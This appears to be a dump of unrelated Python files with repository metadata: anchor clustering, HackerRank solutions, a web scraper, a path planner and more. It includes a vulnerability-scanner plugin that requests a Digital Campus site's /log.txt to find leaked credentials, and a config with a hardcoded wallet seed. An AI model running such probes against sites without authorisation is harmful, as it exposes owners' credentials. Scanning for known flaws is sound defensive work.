img_file_name, bboxes, labels, obj_names, width, height = parse_voc2012_xml(xml_path)
if len(labels) == 0:
# print(img_file_name)
continue
tmp_dict['file_name'] = img_file_name
tmp_dict['obj'] = {'bbox': bboxes, 'label': labels, 'name': obj_names}
tmp_dict['width'] = width
tmp_dict['height'] = height
data_list.append(tmp_dict)
return data_list
def iou(center_box, other_boxes):
intersection_box = np.where(center_box < other_boxes, center_box, other_boxes)
intersection_area = np.prod(intersection_box, axis=1)
center_box_area = np.prod(center_box)
otherbox_areas = np.prod(other_boxes, axis=1)
ious = intersection_area / (center_box_area + otherbox_areas - intersection_area)
return ious
def classification(k, bboxes, use_alias=True):
"""
:param k: 簇个数
:param bboxes: 聚类输入数据
:param use_alias: 为True表示使用alias method进行聚类中心的选择,为False表示使用numpy的choice方法选择中心点
:return:
"""
length = len(bboxes)
center_index = get_centers(k, bboxes, use_alias)
center_coord = bboxes[center_index]
center_tmp = np.zeros_like(center_coord)
ori_dis = np.full(shape=length, fill_value=np.inf)
class_list = np.zeros(shape=length) - 1
times = 1
while np.sum(np.square(center_coord - center_tmp)) > 1e-7:
times += 1
center_tmp = center_coord.copy()
for i in range(k):
new_dis = 1 - iou(center_coord[i], bboxes)
class_list = np.where(ori_dis < new_dis, class_list, i)
ori_dis = np.where(ori_dis < new_dis, ori_dis, new_dis)
# update center
for i in range(k):
center_coord[i] = np.mean(bboxes[class_list == i], axis=0)
return class_list, center_coord
def show_result(raw_data, center_coordinate, class_list, mean_iou):
print('Showing... ...')
colors = [
'#FF0000', '#FFA500', '#FFFF00', '#00FF00', '#228B22',
'#0000FF', '#FF1493', '#EE82EE', '#000000', '#FFA500',
'#00FF00', '#006400', '#00FFFF', '#0000FF', '#FFFACD',
]
use_color = []
for node in class_list:
use_color.append(colors[int(node)])
plt.figure(num=1, figsize=(16, 9))
plt.scatter(x=raw_data[:, 0], y=raw_data[:, 1], c=use_color, s=50, marker='o', alpha=0.3)
plt.scatter(x=center_coordinate[:, 0], y=center_coordinate[:, 1], c='b', s=200, marker='+', alpha=0.8)
plt.title('Mean IOU: %.3f' % mean_iou)
plt.show()
def get_centers(k, bboxes, use_alias):
if use_alias:
centers = [random.randint(a=0, b=len(bboxes))]
tmp_dis = np.full(shape=len(bboxes), fill_value=np.inf)
while len(centers) < k:
for i, center in enumerate(centers):
dis = 1 - iou(center, bboxes)
dis = np.where(dis < tmp_dis, dis, tmp_dis)
probs = dis / np.sum(dis)
# centers.append(np.random.choice(a=len(bboxes), size=1, p=probs)[0])
centers.append(alias_sample(probs, 1)[0])
return centers
else:
return np.random.choice(a=np.arange(len(bboxes)), size=k)
def normalize(data_list):
cluster_x = []
cluster_y = []
for img in data_list:
img_width = img['width']
img_height = img['height']
# box: [ymax, xmax, ymin, xmin]
for box in img['obj']['bbox']:
box_width = box[1] - box[-1]
box_height = box[0] - box[2]
cluster_x.append(box_width / img_width)
cluster_y.append(box_height / img_height)
cluster_x = np.array(cluster_x).reshape(-1, 1)
cluster_y = np.array(cluster_y).reshape(-1, 1)
bboxes = np.hstack([cluster_x, cluster_y])
return bboxes
def kmeans(raw_data, k, use_alias):
class_list, center_coordinate = classification(k, raw_data, use_alias)
return class_list, center_coordinate
def mean_iou(bboxes, class_list, center_coordinate):
ious = []
for label, center in enumerate(center_coordinate):
ious.append(iou(center, bboxes[class_list == label]))
every_class_mean_iou = []
for u in ious:
every_class_mean_iou.append(np.mean(u))
return np.mean(every_class_mean_iou)
def cluster_anchors(voc_path):
if not os.path.exists('./bboxes.pkl'):
voc_train_path = os.path.join(voc_path, 'VOC2012train', 'VOCdevkit', 'VOC2012', 'Annotations')
data_list = parse_voc(voc_train_path)
bboxes = normalize(data_list)
pickle.dump(bboxes, open('./bboxes.pkl', 'wb'))
else:
bboxes = pickle.load(open('./bboxes.pkl', 'rb'))
class_list, center_coordinate = kmeans(bboxes, opt.anchor_num, True)
avg_iou = mean_iou(bboxes, class_list, center_coordinate)
show_result(bboxes, center_coordinate, class_list, avg_iou)
with open('./anchors.txt', 'a') as f:
for wh in center_coordinate[:]:
f.write(str(wh[0] * opt.img_w) + ',' + str(wh[1] * opt.img_h) + '\n')
return center_coordinate, class_list
if __name__ == '__main__':
voc_dir = '/media/dk/MyFiles/Data/VOC/VOC2012train/VOCdevkit/VOC2012/Annotations/'
cluster_anchors(voc_dir)
|
[
"yvlinchiang@gmail.com"
] |
yvlinchiang@gmail.com
|
24e72a47b3f994223ff0c193db2e35e8eaa8b2df
|
b23e4b73832b96fedc229fbf7fa0a5ee9fead44b
|
/server/libs/config.py
|
300dc317428c1b67c1f0233c8b585e33498ecc55
|
[] |
no_license
|
chaeplin/yadashvend
|
d746e4ea6a79add64149fc5112339fe26a580a25
|
295190dee8319821ec0e2b59940cca8b70f2650c
|
refs/heads/master
| 2021-01-12T15:00:13.103716
| 2016-10-29T15:43:00
| 2016-10-29T15:43:00
| 71,659,413
| 1
| 0
| null | 2016-10-23T17:26:57
| 2016-10-22T18:57:54
|
Python
|
UTF-8
|
Python
| false
| false
| 1,629
|
py
|
# seed for generate address
BIP32_TESTNET_SEED = 'DRKPuUb97UQHNUHs5ktawTeAdwMsBaHCsLA1JW8iYpK5orXyiKPba3MyTP4sttpzhWdVKNej2TxkhR3WNrQqWGMg64ood5HaXL5Avi9ad5vaqc8U'
# max keys in r_NEW_ADDR_SET
max_keys_in_r_NEW_ADDR_SET = 100
#key prefix
key_prefix = 'testnet:'
# redis
# key for index of key generation
r_ADDR_GEN_INDEX = key_prefix + 'kusubsetindex'
# key for index of sales
r_ORDER_INDEX = key_prefix + 'orderindex'
# SET Unused address pool
r_NEW_ADDR_SET = key_prefix + 'NEW_ADDRS'
r_USED_ADDR_SET = key_prefix + 'USED_ADDRS'
r_SALE_ADDR_SET = key_prefix + 'SALE_ADDRS'
# client list
r_CLIENT_LIST_SET = key_prefix + 'CLIENT_LIST'
# hash key, client,
r_ADDR_CMD_HASH = key_prefix + 'ADDR:'
r_CLIENT_CMD_HASH = key_prefix + 'CLIENT:'
# list for ix tx and blk hash
r_IX_LIST = key_prefix + 'IX_RECEIVED'
r_BK_LIST = key_prefix + 'BK_RECEIVED'
r_MQ_LIST = key_prefix + 'MQ_RECEIVED'
#
r_SALE_PRICE = 0.02
# topic for mqtt
m_SALE_REQ_SUBSCRIBE = 's/req/#'
m_SALE_DIS_PUBLISH = 's/resp/'
#client1
# publish to --> s/req/client1
# {"clientid": "client1", "cmd": "order", "item": xxx, "msgid": xxx}
# {"clientid": "client1", "cmd": "change", "item": xxx, "msgid": xxx}
# {"clientid": "client1", "cmd": "discard", "item": xxx, "msgid": xxx}
# subscribe to --> s/resp/client1
# {"addr": "yyyyy", "val": "ffff", "cmd": "order", "msgid": xxx}
# {"addr": "yyyyy", "val": "ffff", "cmd": "paid", "msgid": xxx}
# {"addr": "yyyyy", "val": "ffff", "cmd": "dscrd", "msgid": xxx}
#
|
[
"chaeplin@gmail.com"
] |
chaeplin@gmail.com
|
4816f423ce7470e056af3a0ef6115af9bd76c32c
|
ad9bd58a3ec8fa08dfcc994d4101ee815a9f5bc0
|
/02_algorithm/programmers/Level4/도둑질.py
|
7d22e81f4529e1e3a2c44f3d9e41eff8f758d60b
|
[] |
no_license
|
wally-wally/TIL
|
93fc1d0e3bc7d030341ed54155294c68c48b4c7d
|
936783bc86f563646c0398c24e2fcaa707f0ed23
|
refs/heads/master
| 2023-04-28T08:59:48.235747
| 2023-04-12T12:06:52
| 2023-04-12T12:06:52
| 195,918,111
| 40
| 7
| null | 2020-09-29T16:20:46
| 2019-07-09T02:31:02
|
Python
|
UTF-8
|
Python
| false
| false
| 596
|
py
|
def solution(money):
money_length = len(money)
DP = [0 for _ in range(money_length - 1)] # 첫 번째 집부터 턴 경우
DP2 = [0 for _ in range(money_length)] # 두 번째 집부터 턴 경우
# 초기화 과정
DP[0] = money[0]
DP[1] = money[0]
DP2[0] = 0
DP2[1] = money[1]
for i in range(2, money_length - 1):
DP[i] = max(DP[i - 2] + money[i], DP[i - 1])
for i in range(2, money_length):
DP2[i] = max(DP2[i - 2] + money[i], DP2[i - 1])
return max(DP[money_length - 2], DP2[money_length - 1])
print(solution([1, 2, 3, 1])) # 4
|
[
"wallys0213@gmail.com"
] |
wallys0213@gmail.com
|
49323ed787e5f0b7886f1940248e8fa61f45784a
|
61bd955e7d83f7901c8d24fd65d3e59fbb960ff6
|
/Problem2.py
|
135e2316b11026486dbcfbfab157a087ce676363
|
[] |
no_license
|
NinaOwl/ADM_HW1
|
dba0abf9f483ba1ad60f196ee6c9dea89525cc2e
|
08edae46bb87471af44814af785315f52a5005ff
|
refs/heads/main
| 2023-08-21T08:19:04.097651
| 2021-10-10T13:26:54
| 2021-10-10T13:26:54
| 415,559,712
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,995
|
py
|
# birthday-cake-candles https://www.hackerrank.com/challenges/birthday-cake-candles/problem
#!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'birthdayCakeCandles' function below.
#
# The function is expected to return an INTEGER.
# The function accepts INTEGER_ARRAY candles as parameter.
#
def birthdayCakeCandles(candles):
# Write your code here
maxim = max(candles)
count = 0
for i in range(len(candles)):
if candles[i] == maxim:
count +=1
return count
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
candles_count = int(input().strip())
candles = list(map(int, input().rstrip().split()))
result = birthdayCakeCandles(candles)
fptr.write(str(result) + '\n')
fptr.close()
#kangaroo https://www.hackerrank.com/challenges/kangaroo/problem
#!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'kangaroo' function below.
#
# The function is expected to return a STRING.
# The function accepts following parameters:
# 1. INTEGER x1
# 2. INTEGER v1
# 3. INTEGER x2
# 4. INTEGER v2
#
def kangaroo(x1, v1, x2, v2):
# Write your code here
result = "NO"
if (x1-x2)*(v2-v1) > 0:
if (x1-x2)%(v2-v1) ==0:
result = "YES"
if x1 == x2 and v1 == v2:
result = "YES"
return (result)
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
first_multiple_input = input().rstrip().split()
x1 = int(first_multiple_input[0])
v1 = int(first_multiple_input[1])
x2 = int(first_multiple_input[2])
v2 = int(first_multiple_input[3])
result = kangaroo(x1, v1, x2, v2)
fptr.write(result + '\n')
fptr.close()
#viral advertising https://www.hackerrank.com/challenges/strange-advertising/problem
#!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'viralAdvertising' function below.
#
# The function is expected to return an INTEGER.
# The function accepts INTEGER n as parameter.
#
def viralAdvertising(n):
r = 5
likes = 0
for i in range(n):
likes = likes + r//2
r = r//2 * 3
# Write your code here
return likes
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input().strip())
result = viralAdvertising(n)
fptr.write(str(result) + '\n')
fptr.close()
#Digit sum https://www.hackerrank.com/challenges/recursive-digit-sum/problem
#!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'superDigit' function below.
#
# The function is expected to return an INTEGER.
# The function accepts following parameters:
# 1. STRING n
# 2. INTEGER k
#
def superDigit(n, k):
# Write your code here
l = int(n)
summ = l%10
l = l//10
while l > 0:
summ += l%10
l = l//10
l = summ * k
while l > 9:
summ = 0
while l > 0:
summ += l%10
l = l//10
l = summ
return l
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
first_multiple_input = input().rstrip().split()
n = first_multiple_input[0]
k = int(first_multiple_input[1])
result = superDigit(n, k)
fptr.write(str(result) + '\n')
fptr.close()
#InsertionSort1 https://www.hackerrank.com/challenges/insertionsort1/problem
#!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'insertionSort1' function below.
#
# The function accepts following parameters:
# 1. INTEGER n
# 2. INTEGER_ARRAY arr
#
def insertionSort1(n, arr):
el = arr[n - 1]
i = n - 1
while arr[i - 1] >= el:
print(*(arr[:(i-1)+1] + [arr[i-1]] + arr[(i-1)+1:(n-1)]), sep = " ")
i-=1
if i < 1:
break
print (*(arr[:(i-1)+1] + [el] + arr[(i-1)+1:(n-1)]), sep = " ")
# Write your code here
if __name__ == '__main__':
n = int(input().strip())
arr = list(map(int, input().rstrip().split()))
insertionSort1(n, arr)
#InsertionSort2 https://www.hackerrank.com/challenges/insertionsort2/problem
#!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'insertionSort2' function below.
#
# The function accepts following parameters:
# 1. INTEGER n
# 2. INTEGER_ARRAY arr
#
def insertionSort1(n, arr):
#print(n-1)
#print(arr)
el = arr[n - 1]
i = n - 1
while arr[i - 1] >= el:
#arr = (arr[:(i-1)+1] + [arr[i-1]] + arr[(i-1)+1:(n-1)]), sep = " ")
i-=1
if i < 1:
break
return (arr[:i] + [el] + arr[i:n-1] + arr[n:len(arr)])
def insertionSort2(n, arr):
for i in range(n-1):
arr = insertionSort1(i+2, arr)
print(*arr)
# Write your code here
if __name__ == '__main__':
n = int(input().strip())
arr = list(map(int, input().rstrip().split()))
insertionSort2(n, arr)
|
[
"noreply@github.com"
] |
NinaOwl.noreply@github.com
|
e5d99ee86fa8bccd4aad485ec8314e1749a15a00
|
27790d89433cf1cfb8a0ad636ba76c24ec66b7ff
|
/naver_webtoon_crawling.py
|
a6a5c8a3ffb16bb10cf7a42b8520fb09cbd29067
|
[] |
no_license
|
capston123/back_end
|
5625037f0b3bf6f3ae0cb5a75ff19ce781090784
|
9687f225495364d226aee34ac044f2f4a280881f
|
refs/heads/master
| 2023-04-09T19:03:58.639126
| 2021-04-12T18:02:44
| 2021-04-12T18:02:44
| 311,255,740
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,280
|
py
|
"""
1. 클래스로 저장?
2. 23~24시 기준으로 업데이트 웹툰만 크롤링?
"""
import django
from datetime import date
from selenium import webdriver
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "contents.settings")
django.setup()
from webtoons.models import Naver
save_data = []
today_date = date.today()
# chrome 창 크기 조절
options = webdriver.ChromeOptions()
options.add_argument('window-size=1920,1080')
URL_webtoon_home = 'https://comic.naver.com/webtoon/weekday.nhn'
driver = webdriver.Chrome('chromedriver89', options=options)
# 응답 대기
driver.implicitly_wait(5)
# webtoon home으로 이동
driver.get(url=URL_webtoon_home)
# li tag
li_list = driver.find_elements_by_css_selector(
'#content > div.list_area.daily_all > div.col.col_selected > div > ul > li')
for i in range(5):
# li tag
li_list = driver.find_elements_by_css_selector(
'#content > div.list_area.daily_all > div.col.col_selected > div > ul > li')
# 웹툰 제목
webtoon_title = li_list[i].text.replace(
'NEW\n', '').replace('18세 이상 이용 가능\n', '').replace('컷툰\n', '')
# 웹툰 url
webtoon_url = li_list[i].find_element_by_css_selector(
'div > a').get_attribute('href')
# 웹툰 상태 ico_updt == 업데이트 완료
webtoon_status = li_list[i].find_element_by_css_selector(
'div > a > em').get_attribute('class')
# 응답 대기
driver.implicitly_wait(5)
# 웹툰 url로 페이지 이동
driver.get(url=webtoon_url)
# 웹툰 작가
webtoon_author = driver.find_element_by_css_selector(
'#content > div.comicinfo > div.detail > h2')
webtoon_author = webtoon_author.find_element_by_class_name('wrt_nm').text
# 웹툰 썸네일
webtoon_thumbnail = driver.find_element_by_css_selector(
'#content > div.comicinfo > div.thumb > a > img').get_attribute('src')
# 웹툰 카테고리
webtoon_category = driver.find_element_by_css_selector(
'#content > div.comicinfo > div.detail > p.detail_info > span.genre').text
webtoon_category = webtoon_category.replace(" ", '')
recent_thumbnail = ''
recent_url = ''
recent_title = ''
try:
# 웹툰 화별 썸네일
recent_thumbnail = driver.find_element_by_css_selector(
'#content > table > tbody > tr:nth-child(2) > td:nth-child(1) > a > img').get_attribute('src')
# 웹툰 화별 url
recent_url = driver.find_element_by_css_selector(
'#content > table > tbody > tr:nth-child(2) > td.title > a').get_attribute('href')
# 웹툰 화별 제목
recent_title = driver.find_element_by_css_selector(
'#content > table > tbody > tr:nth-child(2) > td.title > a').text
except:
# 웹툰 화별 썸네일
recent_thumbnail = driver.find_element_by_css_selector(
'#content > table > tbody > tr:nth-child(3) > td:nth-child(1) > a > img').get_attribute('src')
# 웹툰 화별 url
recent_url = driver.find_element_by_css_selector(
'#content > table > tbody > tr:nth-child(3) > td.title > a').get_attribute('href')
# 웹툰 화별 제목
recent_title = driver.find_element_by_css_selector(
'#content > table > tbody > tr:nth-child(3) > td.title > a').text
print("제목 : " + webtoon_title +
"\n작가 : " + webtoon_author +
"\n카테고리 : " + webtoon_category +
"\n업데이트 상태 : " + webtoon_status +
"\n썸네일 : " + webtoon_thumbnail +
"\nURL : " + webtoon_url +
"\n최신 작품 제목 : " + recent_title +
"\n최신 작품 썸네일 : " + recent_thumbnail +
"\n최신 작품 URL : " + recent_url + "\n")
temp_data = []
temp_data.append(webtoon_title+' '+recent_title)
temp_data.append(recent_url)
temp_data.append(recent_thumbnail)
temp_data.append(webtoon_category)
save_data.append(temp_data)
# 응답 대기
driver.implicitly_wait(5)
# webtoon home으로 이동
driver.get(url=URL_webtoon_home)
for name, url, image, category in save_data:
obj = Naver(name=name, url=url, image=image, category=category)
obj.save()
driver.close()
|
[
"sunsu2737@gmail.com"
] |
sunsu2737@gmail.com
|
6d5a54b10e007cacf22f064a0fcd21ac7e0bfe12
|
ba2b72c485ca6f8e62e7ca7c0286ac41641f85a9
|
/openrec/utils/samplers/pointwise_sampler.py
|
baef51f6af781bc7a0eeb752add3d41f5e613736
|
[
"Apache-2.0"
] |
permissive
|
christinatsan/openrec
|
8a2a9f411a51f853f88fe79a25304ea53c79bf81
|
f4eb2fda42818705053b775facfa34921dcd5762
|
refs/heads/master
| 2021-05-16T14:39:55.245752
| 2018-01-22T16:43:26
| 2018-01-22T16:43:26
| 118,484,419
| 0
| 0
| null | 2018-01-22T16:36:28
| 2018-01-22T16:36:28
| null |
UTF-8
|
Python
| false
| false
| 2,411
|
py
|
import numpy as np
import random
from multiprocessing import Process
from openrec.utils.samplers import Sampler
class _PointwiseSampler(Process):
def __init__(self, dataset, batch_size, pos_ratio, q):
self._dataset = dataset
self._batch_size = batch_size
self._num_pos = int(batch_size * pos_ratio)
self._user_list = self._dataset.get_unique_user_list()
self._q = q
self._state = 0
super(_PointwiseSampler, self).__init__()
def run(self):
while True:
input_npy = np.zeros(self._batch_size, dtype=[('user_id_input', np.int32),
('item_id_input', np.int32),
('labels', np.float32)])
if self._state + self._num_pos >= len(self._dataset.data):
self._state = 0
self._dataset.shuffle()
for ind in range(self._num_pos):
entry = self._dataset.data[self._state + ind]
input_npy[ind] = (entry['user_id'], entry['item_id'], 1.0)
for ind in range(self._batch_size - self._num_pos):
user_ind = int(random.random() * (len(self._user_list) - 1))
user_id = self._user_list[user_ind]
neg_id = int(random.random() * (self._dataset.max_item() - 1))
while neg_id in self._dataset.get_interactions_by_user_gb_item(user_id):
neg_id = int(random.random() * (self._dataset.max_item() - 1))
input_npy[ind + self._num_pos] = (user_id, neg_id, 0.0)
self._state += self._num_pos
self._q.put(input_npy, block=True)
class PointwiseSampler(Sampler):
def __init__(self, dataset, batch_size, pos_ratio=0.5, num_process=5, chronological=False):
self._pos_ratio = pos_ratio
self._chronological = chronological
if chronological:
num_process = 1
super(PointwiseSampler, self).__init__(dataset=dataset, batch_size=batch_size, num_process=num_process)
def _get_runner(self):
return _PointwiseSampler(dataset=self._dataset,
pos_ratio=self._pos_ratio,
batch_size=self._batch_size,
q=self._q)
|
[
"ylongqi@gmail.com"
] |
ylongqi@gmail.com
|
c702c82bd6cb53a5ba57c999529361d2ef38e4b0
|
0db05f7b843e8450bafd5ae23f8f70f9a9a8c151
|
/Src/StdLib/Lib/site-packages/pythonwin/pywin/framework/bitmap.py
|
6d6bcd5ecbe4a4a1e59b87f1a7d7b8583e8d26f7
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"BSD-3-Clause",
"Python-2.0",
"LGPL-2.0-only"
] |
permissive
|
IronLanguages/ironpython2
|
9c7f85bd8e6bca300e16f8c92f6384cecb979a6a
|
d00111890ce41b9791cb5bc55aedd071240252c4
|
refs/heads/master
| 2023-01-21T21:17:59.439654
| 2023-01-13T01:52:15
| 2023-01-13T01:52:15
| 91,620,472
| 1,171
| 288
|
Apache-2.0
| 2023-01-13T01:52:16
| 2017-05-17T21:11:51
|
Python
|
UTF-8
|
Python
| false
| false
| 4,646
|
py
|
import win32ui
import win32con
import win32api
import string
import os
import app
import sys
from pywin.mfc import docview, window
bStretch = 1
class BitmapDocument(docview.Document):
"A bitmap document. Holds the bitmap data itself."
def __init__(self, template):
docview.Document.__init__(self, template)
self.bitmap=None
def OnNewDocument(self):
# I can not create new bitmaps.
win32ui.MessageBox("Bitmaps can not be created.")
def OnOpenDocument(self, filename):
self.bitmap=win32ui.CreateBitmap()
# init data members
f = open(filename, 'rb')
try:
try:
self.bitmap.LoadBitmapFile(f)
except IOError:
win32ui.MessageBox("Could not load the bitmap from %s" % filename)
return 0
finally:
f.close()
self.size = self.bitmap.GetSize()
return 1
def DeleteContents(self):
self.bitmap=None
class BitmapView(docview.ScrollView):
"A view of a bitmap. Obtains data from document."
def __init__(self, doc):
docview.ScrollView.__init__(self, doc)
self.width = self.height = 0
# set up message handlers
self.HookMessage (self.OnSize, win32con.WM_SIZE)
def OnInitialUpdate(self):
doc = self.GetDocument()
if doc.bitmap:
bitmapSize = doc.bitmap.GetSize()
self.SetScrollSizes(win32con.MM_TEXT, bitmapSize)
def OnSize (self, params):
lParam = params[3]
self.width = win32api.LOWORD(lParam)
self.height = win32api.HIWORD(lParam)
def OnDraw (self, dc):
# set sizes used for "non stretch" mode.
doc = self.GetDocument()
if doc.bitmap is None: return
bitmapSize = doc.bitmap.GetSize()
if bStretch:
# stretch BMP.
viewRect = (0,0,self.width, self.height)
bitmapRect = (0,0,bitmapSize[0], bitmapSize[1])
doc.bitmap.Paint(dc, viewRect, bitmapRect)
else:
# non stretch.
doc.bitmap.Paint(dc)
class BitmapFrame(window.MDIChildWnd):
def OnCreateClient( self, createparams, context ):
borderX = win32api.GetSystemMetrics(win32con.SM_CXFRAME)
borderY = win32api.GetSystemMetrics(win32con.SM_CYFRAME)
titleY = win32api.GetSystemMetrics(win32con.SM_CYCAPTION) # includes border
# try and maintain default window pos, else adjust if cant fit
# get the main client window dimensions.
mdiClient = win32ui.GetMainFrame().GetWindow(win32con.GW_CHILD)
clientWindowRect=mdiClient.ScreenToClient(mdiClient.GetWindowRect())
clientWindowSize=(clientWindowRect[2]-clientWindowRect[0],clientWindowRect[3]-clientWindowRect[1])
left, top, right, bottom=mdiClient.ScreenToClient(self.GetWindowRect())
# width, height=context.doc.size[0], context.doc.size[1]
# width = width+borderX*2
# height= height+titleY+borderY*2-1
# if (left+width)>clientWindowSize[0]:
# left = clientWindowSize[0] - width
# if left<0:
# left = 0
# width = clientWindowSize[0]
# if (top+height)>clientWindowSize[1]:
# top = clientWindowSize[1] - height
# if top<0:
# top = 0
# height = clientWindowSize[1]
# self.frame.MoveWindow((left, top, left+width, top+height),0)
window.MDIChildWnd.OnCreateClient(self, createparams, context)
return 1
class BitmapTemplate(docview.DocTemplate):
def __init__(self):
docview.DocTemplate.__init__(self, win32ui.IDR_PYTHONTYPE, BitmapDocument, BitmapFrame, BitmapView)
def MatchDocType(self, fileName, fileType):
doc = self.FindOpenDocument(fileName)
if doc: return doc
ext = os.path.splitext(fileName)[1].lower()
if ext =='.bmp': # removed due to PIL! or ext=='.ppm':
return win32ui.CDocTemplate_Confidence_yesAttemptNative
return win32ui.CDocTemplate_Confidence_maybeAttemptForeign
# return win32ui.CDocTemplate_Confidence_noAttempt
# For debugging purposes, when this module may be reloaded many times.
try:
win32ui.GetApp().RemoveDocTemplate(bitmapTemplate)
except NameError:
pass
bitmapTemplate = BitmapTemplate()
bitmapTemplate.SetDocStrings('\nBitmap\nBitmap\nBitmap (*.bmp)\n.bmp\nPythonBitmapFileType\nPython Bitmap File')
win32ui.GetApp().AddDocTemplate(bitmapTemplate)
# This works, but just didnt make it through the code reorg.
#class PPMBitmap(Bitmap):
# def LoadBitmapFile(self, file ):
# magic=file.readline()
# if magic <> "P6\n":
# raise TypeError, "The file is not a PPM format file"
# rowcollist=string.split(file.readline())
# cols=string.atoi(rowcollist[0])
# rows=string.atoi(rowcollist[1])
# file.readline() # whats this one?
# self.bitmap.LoadPPMFile(file,(cols,rows))
def t():
bitmapTemplate.OpenDocumentFile('d:\\winnt\\arcade.bmp')
#OpenBMPFile( 'd:\\winnt\\arcade.bmp')
def demo():
import glob
winDir=win32api.GetWindowsDirectory()
for fileName in glob.glob1(winDir, '*.bmp')[:2]:
bitmapTemplate.OpenDocumentFile(os.path.join(winDir, fileName))
|
[
"pawel.jasinski@gmail.com"
] |
pawel.jasinski@gmail.com
|
4777c5b5c8a5917975b15e51607d87d7d16d0173
|
c048d2cb39d391cdbf530523eb2832d44dce708a
|
/Plugins/digital_campus/campus_log_disclosure.py
|
e5c5ab2044e188213d0310aaedfbe5ef8cc9b383
|
[] |
no_license
|
z3r023/FrameScan-GUI
|
434655e81a354365ff2cce9c2d714f255d694111
|
e207108fc4e4878d6c66cc72779caed29b788057
|
refs/heads/master
| 2020-08-08T12:14:58.074632
| 2019-10-06T10:38:42
| 2019-10-06T10:38:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,394
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: Digital-Campus数字校园平台LOG文件泄露
referer: http://www.wooyun.org/bugs/wooyun-2014-071575
author: Lucifer
description: 关键词:intitle:数字校园平台--Digital Campus2.0 Platform。log.txt日志文件泄露,可获取数据库账号等敏感信息。
'''
import re
import sys
import requests
import warnings
class campus_log_disclosure:
def __init__(self, url):
self.url = url
def run(self):
result = ['Digital-Campus数字校园平台LOG文件泄露', '', '']
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/log.txt"
pattern = re.compile(r'\d{4}-\d{2}-\d{2}\s+\d{2}:\d{2}:\d{2}')
vulnurl = self.url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
result = pattern.findall(req.text)
if len(result) != 0:
result[2] ='存在'
result[1] = vulnurl
else:
result[2] ='不存在'
except:
result[2] = '未知'
return result
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = campus_log_disclosure(sys.argv[1])
testVuln.run()
|
[
"1919010193@qq.com"
] |
1919010193@qq.com
|
f5fc4d106bf0a2c637b87d9bf0ec63bedd3b338d
|
d727fdbbdd5dd8914811cba33c09d10dd393299e
|
/TrajectoryPlanning/pathLatticeXY3.py
|
e2400d06d121fb0415a5a9adb4919369231e6585
|
[
"MIT"
] |
permissive
|
gaohongfein/PTPSim
|
60030f5c926895c856b6a4f4f48b542a09e84b3e
|
63bc0b7e81846fdd02dc8c105f356595cb9f3d91
|
refs/heads/master
| 2022-01-20T16:35:37.240997
| 2019-08-17T14:45:52
| 2019-08-17T14:45:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,906
|
py
|
"""
MIT License
Copyright (c) 2019 ming
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
===============================
# @File : pathLatticeXY3.py
# @Author: ming.ustb@outlook.com
# @Date : 19-5-20
# @GitHub: https://github.com/yangmingustb/PTPSim
================================
this is pathLattice converted into the xy coordinates
"""
import numpy as np
import Curves.Cubic as cubic
import matplotlib.pyplot as plt
import math
import Scenarios.multiLane as multiLane
import Curves.cubic_spline as cubicSpline
import FrenetMath.FrenetToCartesian as ftc
import model.simModel as car
# 注意,这里有两个cubic,一个是连接两个状态,一个是用样条连接所有waypoints构成行驶环境
showSamplingPath = True
show_obstacle = True
showVehicleStart = True
longitudinal_num = 5
lateral_num = 9 # 横向采样个数
longitudinal_step = 20.0
lateral_step = 0.5
s0 = 100.0 # 全局变量,全局调整
lane_width = 3.75
refLineRho = lane_width*0.5
laneChaneRefLine = lane_width*1.5
start_SRho = [s0, refLineRho, 0.0 * math.pi / 180.0]
static_obs = [[s0 + 20, refLineRho - 0.3], [s0 + 40, refLineRho + 0.5], [s0 + 70, refLineRho - 0.2]]
obstacleHeading = 0.0
def sampling(x_row, y_column, lateral_step, longitudinal_step):
"""
:param x_row: s采样个数
:param y_column: lateral采样个数
:param lateral_step: 采样步长
:param longitudinal_step: 纵向采样步长
:return:s-rho坐标系端点
"""
end_set = np.empty(shape=[x_row, y_column, 3])
for i in range(x_row):
x_i = (i + 1) * longitudinal_step + start_SRho[0]
for j in range(y_column):
y_i = (j - lane_width) * lateral_step + laneChaneRefLine
target_point = [x_i, y_i, 0.0 * math.pi / 180.0]
end_set[i, j] = np.array(target_point)
